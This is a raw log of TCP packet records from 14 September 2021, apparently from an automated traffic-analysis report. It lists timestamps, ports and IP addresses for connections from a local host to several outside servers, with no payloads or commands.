                                                                                                                                                                      Sep 14, 2021 16:03:20.137682915 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:20.178255081 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:20.611062050 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:20.750940084 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.647305965 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.647342920 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.650079012 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:21.873105049 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.873159885 CEST44349740173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.873353004 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.875137091 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.875197887 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.876682043 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.896848917 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.896888018 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:21.896929026 CEST44349740173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.896929026 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.318064928 CEST44349740173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.321357965 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.326577902 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.326772928 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.470643044 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.470680952 CEST44349740173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.472085953 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.472103119 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.472162008 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.472172022 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.476360083 CEST44349740173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.477334023 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.478369951 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.481487036 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.623094082 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.623182058 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.623204947 CEST44349739173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.623267889 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.626868963 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.626921892 CEST49739443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.634169102 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.634272099 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:22.685231924 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.685235977 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.685288906 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.685290098 CEST44349742173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.687156916 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.687591076 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.687612057 CEST44349742173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.688129902 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.688167095 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:22.688178062 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.130965948 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.131134033 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.135868073 CEST44349742173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.136034966 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.138343096 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.138360977 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.138676882 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.138747931 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.139683962 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.142352104 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.142379045 CEST44349742173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.142632008 CEST44349742173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.142690897 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.183137894 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.464582920 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.466078997 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.466099977 CEST44349741173.192.101.24192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.466159105 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.469449043 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.469459057 CEST49741443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:23.517185926 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.517239094 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.517271042 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.517304897 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.517436028 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.518336058 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.518351078 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.518470049 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.518970966 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.518996000 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.606755972 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.606992960 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.607831955 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.607923031 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.612099886 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.612128973 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.612489939 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.612504959 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.612565041 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.613780022 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.613795042 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.614167929 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.614227057 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.659214973 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.728368998 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.739238977 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.739260912 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.739428997 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.740961075 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.741117001 CEST44349743168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.741214991 CEST49743443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.743386984 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.790546894 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.791484118 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.794632912 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.794663906 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.798192024 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.798212051 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:23.807296991 CEST44349744168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.807419062 CEST49744443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.011017084 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.011080027 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.011384964 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.012243032 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.012293100 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.013890028 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.062239885 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.062272072 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.063659906 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.063680887 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.102133989 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.123687983 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.124353886 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.132294893 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132312059 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132318974 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.132330894 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132335901 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.137928009 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.138694048 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.139177084 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.139184952 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.148730993 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.150055885 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.150072098 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.154473066 CEST8049747142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.158787012 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.185957909 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.185991049 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.186017990 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.188958883 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.188981056 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.193629980 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.193650007 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.193660021 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.203008890 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.214982033 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.260256052 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.264884949 CEST4975080192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.287082911 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.290128946 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.290153980 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.299031973 CEST8049750142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.304351091 CEST4975080192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.343800068 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.355325937 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.355596066 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.360132933 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.360176086 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.360281944 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.361092091 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.361104965 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.441090107 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.445367098 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450493097 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450510979 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.450897932 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450907946 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.453886032 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.454556942 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563153982 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563231945 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563271999 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563276052 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563302040 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563309908 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563328028 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563330889 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563347101 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563354015 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563385010 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563412905 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.564670086 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.564768076 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.564779997 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.564824104 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.566828966 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.566937923 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.566951990 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.566994905 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.568979979 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.569061995 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.569076061 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.569117069 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.571098089 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.571188927 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.571198940 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.571240902 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.590122938 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.590245962 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.590264082 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.590311050 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.591016054 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.591094971 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.591104984 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.591145992 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.593240023 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.593303919 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.593317032 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.593358994 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.595355988 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.595423937 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.595434904 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.595694065 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.597529888 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.597606897 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.597616911 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.597660065 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.599653006 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.599750996 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.599764109 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.599813938 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.601557016 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.601612091 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.601622105 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.601713896 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.603427887 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.603497982 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.603507996 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.603557110 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.605134010 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.605211020 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.605221033 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.605273008 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.606964111 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.607032061 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.607043982 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.607095003 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.608819008 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.608922005 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.608933926 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.608980894 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.610537052 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.610593081 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.610601902 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.610641956 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.610646963 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.610687017 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.612334967 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.612396002 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.612407923 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.612448931 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.614125013 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.614214897 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.614233971 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.614279032 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.615952969 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.616045952 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.616069078 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.616116047 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.617331028 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.617424011 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.617441893 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.617495060 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.618712902 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.618771076 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.618788958 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.618837118 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.619903088 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.619961977 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.619977951 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.620024920 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.621161938 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.621227026 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.621243954 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.621290922 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.622416973 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.622473955 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.622492075 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.622562885 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.623763084 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.623821974 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.623836040 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.623883963 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.624902964 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.624955893 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.624972105 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.625017881 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.626132965 CEST44349751142.250.102.106192.168.2.6
